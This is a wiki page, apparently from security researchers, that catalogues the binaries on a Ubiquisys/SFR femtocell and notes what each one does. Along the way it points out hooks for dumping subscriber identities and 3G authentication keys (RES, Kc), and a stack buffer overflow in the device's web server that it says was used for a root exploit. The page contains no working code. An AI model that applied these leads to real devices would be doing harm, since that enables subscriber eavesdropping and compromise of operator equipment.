This is a collection of binaries running on the device. This list also includes a rudimentary description of their functionality as far as we can judge. We did not fully reverse them and just acquired basic knowledge required to understand the functionality of the device and implement our attacks. Those binaries come from Ubiquisys (vendor) and not from SFR (operator).

binaries

apm

  • performance measurements

bqos

  • backhaul quality of service, submits bqos performance data via ftp

cci

  • (common control interface?) db interface service

dc

  • firmware check/download/recovery via web interface

local_trace

  • receives on data on a trace socket, dumps to /tmp/local_trace.bin (not working for whatever reason)
  • listens on 10010 udp and receives traces

libosal.so

  • central shared library used by almost all system services
  • provides message queue functionality for IPC
  • provides functions for configuration parsing
  • provides debug functionality
  • it uses libiniparser (API)
  • note : iniparser is also used by kamailio
  • used to parse e.g. operator.ini

gan

  • GAN client
  • some interesting functions to hook:
  • gac_cnv_sc_imsi_gac_imsi
  • gan also receives location updating request information, might be interesting to hook as well ⇒ ganif_gac__dl_payload_xfr_hdlr maybe
  • dump timsis
  • ganif_sc_message_handler is _the_ huge message handling function, 105 case switch

scapp

  • service control application
  • using sqlite database
  • also initiating factory recovery?!

usim

  • sim controller program talking to the sim via serial port
  • interesting note: can somehow interact with google maps (nlpp)
  • we can get RES,Kc from this application via hooking dbg_trace here, called from run_3g_authentication

tr069

  • TR-069 remote provisioning service
  • used by the operator to push configuration updates to the device
  • based on SOAP and XML
  • copyright 1985, 1989 regents of the university of california. can we acquire the source somehow?

srv

sipc

  • complete sip client
  • settings numbers for fire,marine,mountain emergency,ambulance, police…
  • note: what is 192.168.50.169 as seen in the authentication code
  • looks also responsible for rtp

wsal

  • mini httpd with hardcoded cgi scripts, see html
  • based on shttpd
  • contains stack-based buffer overflow in PUT processing, see root exploit

cci

  • soap client?!

netc

  • responsible for network configuration:
    • interfaces
    • routes
    • iptables rules
    • ntp

zapinit

  • Zone Access Point init
  • central managing service for all other system binaries
  • starts initial services as well as restarting crashed ones

/dev/pico_sram

the dc,usim,rs and zapinit binaries are mapping this and storing various information in it. valuable data might be in there, we should look into this

binaries.txt · Last modified: 2011/08/30 15:34 (external edit)
 
Except where otherwise noted, content on this wiki is licensed under the following license: CC Attribution-Share Alike 3.0 Unported
Recent changes RSS feed Donate Powered by PHP Valid XHTML 1.0 Valid CSS Driven by DokuWiki